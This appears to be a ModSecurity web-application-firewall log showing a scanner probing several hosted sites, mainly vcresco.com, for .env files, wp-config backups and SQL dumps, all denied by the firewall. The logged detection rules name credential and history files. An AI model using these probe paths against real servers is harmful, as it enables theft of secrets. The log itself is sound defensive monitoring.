[Tue May 26 13:04:06.072782 2026] [security2:error] [pid 470766:tid 470977] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4C8QAAUUs"]
[Tue May 26 13:04:06.076464 2026] [security2:error] [pid 470766:tid 470977] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4C8wAAUWA"]
[Tue May 26 13:04:06.097021 2026] [security2:error] [pid 470766:tid 470964] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4C9gAAAEQ"]
[Tue May 26 13:04:06.124580 2026] [security2:error] [pid 470766:tid 470876] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/website/.env"] [unique_id "ahVM7ujO_W1DqEcFHQ4DBQAAUW0"]
[Tue May 26 13:04:06.126665 2026] [security2:error] [pid 470766:tid 470902] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4C-QAAAAY"]
[Tue May 26 13:04:06.186417 2026] [security2:error] [pid 470766:tid 470776] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-config.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4DDgAAUQk"]
[Tue May 26 13:04:06.186646 2026] [security2:error] [pid 470766:tid 470798] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "vcresco.com"] [uri "/wp-config.php.bak"] [unique_id "ahVM7ujO_W1DqEcFHQ4DDwAAUR8"]
[Tue May 26 13:04:06.195593 2026] [security2:error] [pid 470766:tid 470783] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "vcresco.com"] [uri "/wp-config.php.new"] [unique_id "ahVM7ujO_W1DqEcFHQ4DEAAAURA"]
[Tue May 26 13:04:06.195758 2026] [security2:error] [pid 470766:tid 470874] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "vcresco.com"] [uri "/wp-config.php.old"] [unique_id "ahVM7ujO_W1DqEcFHQ4DEQAAUWs"]
[Tue May 26 13:04:06.217037 2026] [security2:error] [pid 470766:tid 470866] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/wp-content/mysql.sql"] [unique_id "ahVM7ujO_W1DqEcFHQ4DEwAAUWM"]
[Tue May 26 13:04:06.285150 2026] [security2:error] [pid 470766:tid 470969] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4C_QAAAEk"]
[Tue May 26 13:04:06.285407 2026] [security2:error] [pid 470766:tid 470977] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4DAAAAUQ0"]
[Tue May 26 13:04:06.288652 2026] [security2:error] [pid 470766:tid 470985] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4DAwAAAFk"]
[Tue May 26 13:04:06.299702 2026] [security2:error] [pid 470766:tid 470958] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4DBwAAAD4"]
[Tue May 26 13:04:06.302517 2026] [security2:error] [pid 470766:tid 470977] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4DEgAAUXk"]
[Tue May 26 13:04:06.306474 2026] [security2:error] [pid 470766:tid 470938] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4DGAAAACo"]
[Tue May 26 13:04:06.307126 2026] [security2:error] [pid 470766:tid 470939] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4DCwAAACs"]
[Tue May 26 13:04:06.319919 2026] [security2:error] [pid 470766:tid 470977] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4DFQAAURI"]
[Tue May 26 13:04:06.518090 2026] [security2:error] [pid 470766:tid 471023] [client 195.178.110.199:43268] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/backend/.env"] [unique_id "ahVM7ujO_W1DqEcFHQ4DKAAAAH8"]
[Tue May 26 13:04:06.603563 2026] [security2:error] [pid 470766:tid 471011] [client 195.178.110.199:43300] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(\\\\/\\\\*\\\\!? ?(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe|union|concat|group_concat))" at REQUEST_FILENAME. [file "/opt/mod_security/hg_rules.conf"] [line "1019"] [id "9000042"] [rev "2.2.2"] [msg "SQL Comment Sequence Detected."] [data "/*update"] [hostname "vcresco.com"] [uri "/*update.cgi*"] [unique_id "ahVM7ujO_W1DqEcFHQ4DMwAAAHM"]
[Tue May 26 13:04:06.614525 2026] [security2:error] [pid 470766:tid 470992] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4DLgAAAGA"]
[Tue May 26 13:04:06.618339 2026] [security2:error] [pid 470766:tid 471004] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4DMQAAAGw"]
[Tue May 26 13:04:06.628776 2026] [security2:error] [pid 470766:tid 470974] [client 195.178.110.199:43306] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4DMgAAAE4"]
[Tue May 26 13:04:06.650564 2026] [security2:error] [pid 470766:tid 470967] [client 195.178.110.199:43314] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.env"] [unique_id "ahVM7ujO_W1DqEcFHQ4DPAAAAEc"]
[Tue May 26 13:04:06.817788 2026] [security2:error] [pid 470766:tid 470980] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4DSwAAAFQ"]
[Tue May 26 13:04:06.879307 2026] [security2:error] [pid 470766:tid 470921] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4DTgAAABk"]
[Tue May 26 13:04:06.908525 2026] [security2:error] [pid 470766:tid 471007] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4DVAAAAG8"]
[Tue May 26 13:04:06.911527 2026] [security2:error] [pid 470766:tid 470924] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4DUwAAABw"]
[Tue May 26 13:04:06.929452 2026] [security2:error] [pid 470766:tid 470968] [client 195.178.110.199:43306] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.docker/.env"] [unique_id "ahVM7ujO_W1DqEcFHQ4DWAAAAEg"]
[Tue May 26 13:04:06.962438 2026] [security2:error] [pid 470766:tid 471000] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4DWwAAAGg"]
[Tue May 26 13:04:06.968288 2026] [security2:error] [pid 470766:tid 470972] [client 195.178.110.199:43290] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.docker/laravel/app/.env"] [unique_id "ahVM7ujO_W1DqEcFHQ4DYgAAAEw"]
[Tue May 26 13:04:06.987592 2026] [security2:error] [pid 470766:tid 470938] [client 195.178.110.199:43254] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4DXwAAACo"]
[Tue May 26 13:04:07.023586 2026] [security2:error] [pid 470766:tid 470918] [client 195.178.110.199:43268] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7ujO_W1DqEcFHQ4DZAAAABY"]
[Tue May 26 13:04:07.077713 2026] [security2:error] [pid 470766:tid 470987] [client 195.178.110.199:43378] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.env"] [unique_id "ahVM7-jO_W1DqEcFHQ4DawAAAFs"]
[Tue May 26 13:04:07.091691 2026] [security2:error] [pid 470766:tid 471002] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4DagAAAGo"]
[Tue May 26 13:04:07.094730 2026] [security2:error] [pid 470766:tid 471008] [client 4.201.75.230:5293] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-conffg.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4DdQAAAHA"]
[Tue May 26 13:04:07.110891 2026] [security2:error] [pid 470766:tid 470941] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4DbwAAAC0"]
[Tue May 26 13:04:07.116844 2026] [security2:error] [pid 470766:tid 470897] [client 195.178.110.199:43290] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.env.backup"] [unique_id "ahVM7-jO_W1DqEcFHQ4DdgAAAAE"]
[Tue May 26 13:04:07.117105 2026] [security2:error] [pid 470766:tid 470911] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4DcwAAAA8"]
[Tue May 26 13:04:07.174816 2026] [security2:error] [pid 470766:tid 470999] [client 195.178.110.199:43268] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.env.bak"] [unique_id "ahVM7-jO_W1DqEcFHQ4DegAAAGc"]
[Tue May 26 13:04:07.213649 2026] [security2:error] [pid 470766:tid 470934] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4DfQAAACY"]
[Tue May 26 13:04:07.216164 2026] [security2:error] [pid 470766:tid 470912] [client 5.183.252.121:0] ModSecurity: Warning. Matched phrase "Nutch" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "503"] [hostname "shahvishaal.com"] [uri "/index.php"] [unique_id "ahVM7ejO_W1DqEcFHQ4CaAAAABA"]
[Tue May 26 13:04:07.217073 2026] [security2:error] [pid 470766:tid 470901] [client 5.183.252.121:20411] ModSecurity: Warning. Matched phrase "Nutch" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "503"] [hostname "shahvishaal.com"] [uri "/robots.txt"] [unique_id "ahVM7ejO_W1DqEcFHQ4CZQAAAAU"]
[Tue May 26 13:04:07.250543 2026] [security2:error] [pid 470766:tid 471016] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4DgQAAAHg"]
[Tue May 26 13:04:07.258907 2026] [security2:error] [pid 470766:tid 471021] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4DhAAAAH0"]
[Tue May 26 13:04:07.298300 2026] [security2:error] [pid 470766:tid 470914] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4DigAAABI"]
[Tue May 26 13:04:07.303619 2026] [security2:error] [pid 470766:tid 470981] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4DjQAAAFU"]
[Tue May 26 13:04:07.370023 2026] [security2:error] [pid 470766:tid 471003] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4DkwAAAGs"]
[Tue May 26 13:04:07.411284 2026] [security2:error] [pid 470766:tid 470984] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4DlgAAAFg"]
[Tue May 26 13:04:07.415293 2026] [security2:error] [pid 470766:tid 470921] [client 195.178.110.199:43424] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.env.old"] [unique_id "ahVM7-jO_W1DqEcFHQ4DmgAAABk"]
[Tue May 26 13:04:07.433845 2026] [security2:error] [pid 470766:tid 470960] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4DmQAAAEA"]
[Tue May 26 13:04:07.550046 2026] [security2:error] [pid 470766:tid 471015] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4DpAAAAHc"]
[Tue May 26 13:04:07.558242 2026] [security2:error] [pid 470766:tid 470968] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4DpgAAAEg"]
[Tue May 26 13:04:07.613193 2026] [security2:error] [pid 470766:tid 470931] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4DrAAAACM"]
[Tue May 26 13:04:07.654449 2026] [security2:error] [pid 470766:tid 470918] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4DsQAAABY"]
[Tue May 26 13:04:07.676123 2026] [security2:error] [pid 470766:tid 470905] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4DtQAAAAk"]
[Tue May 26 13:04:07.704718 2026] [security2:error] [pid 470766:tid 470971] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4DuwAAAEs"]
[Tue May 26 13:04:07.751583 2026] [security2:error] [pid 470766:tid 470975] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4DvgAAAE8"]
[Tue May 26 13:04:07.790875 2026] [security2:error] [pid 470766:tid 470906] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4DwQAAAAo"]
[Tue May 26 13:04:07.810594 2026] [security2:error] [pid 470766:tid 470901] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4DxwAAAAU"]
[Tue May 26 13:04:07.908838 2026] [security2:error] [pid 470766:tid 471019] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4D1AAAAHs"]
[Tue May 26 13:04:07.925197 2026] [security2:error] [pid 470766:tid 470976] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4D1gAAAFA"]
[Tue May 26 13:04:07.930843 2026] [security2:error] [pid 470766:tid 470996] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4D1QAAAGQ"]
[Tue May 26 13:04:07.965418 2026] [security2:error] [pid 470766:tid 470981] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4D2wAAAFU"]
